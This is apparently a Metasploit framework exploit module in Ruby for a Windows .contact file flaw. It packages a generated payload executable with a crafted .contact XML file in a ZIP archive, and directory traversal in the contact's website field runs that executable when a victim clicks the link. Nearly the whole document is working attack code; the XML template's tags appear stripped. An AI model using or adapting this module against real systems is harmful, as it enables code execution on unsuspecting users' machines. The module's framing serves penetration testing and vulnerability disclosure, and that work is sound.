## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'fileutils' require 'rex/zip' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Windows Contact File Format Arbitary Code Execution', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user. Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs. Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys. The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory. This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well. }, 'Author' => [ 'John Page (aka hyp3rlinx)', # Vuln discovery 'Brenner Little' # MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['EDB', '46188'], ['URL', 'http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt'], ['ZDI', '19-013'] ], 'DisclosureDate' => 'Jan 17 2019', # According to https://www.exploit-db.com/exploits/46188 'Privileged' => false, 'Platform' => 'win', 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Targets' => [['Windows', { }]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('WEBSITE', [true, 'The URL that the user must click to launch the payload.', 'www.metasploit.com']), OptString.new('FILENAME', [true, 'The first and last name embdeed in the .CONTACT file (also used as the filename for the .CONTACT and .ZIP files)', 'John Smith']), ]) end def exploit contact_full_name = "#{datastore['FILENAME']}" exe_filename = "#{datastore['WEBSITE']}" xml_header = %Q| \t \t2019-04-10T20:19:26Z \t| xml_body = %Q| e3b2d76c-3355-4f54-b995-0ce0dcf84c8a CONTACT_FULL_NAME CONTACT_LAST_NAME CONTACT_FIRST_NAME UserTile EXE_PATH Business |.gsub(/\n[ ]*/,'') xml = xml_header + xml_body xml.gsub!(/CONTACT_FULL_NAME/, contact_full_name); xml.gsub!(/CONTACT_LAST_NAME/, contact_full_name.split(' ')[-1]); xml.gsub!(/CONTACT_FIRST_NAME/, contact_full_name.split(' ')[0]); xml.gsub!(/EXE_PATH/, "http.\\" + exe_filename); exe = generate_payload_exe zip = Rex::Zip::Archive.new zip.add_file("/http/" + exe_filename, exe) zip.add_file(contact_full_name + ".contact", xml) zip.save_to(contact_full_name + ".zip") print_good("Created '#{contact_full_name}.zip'") end end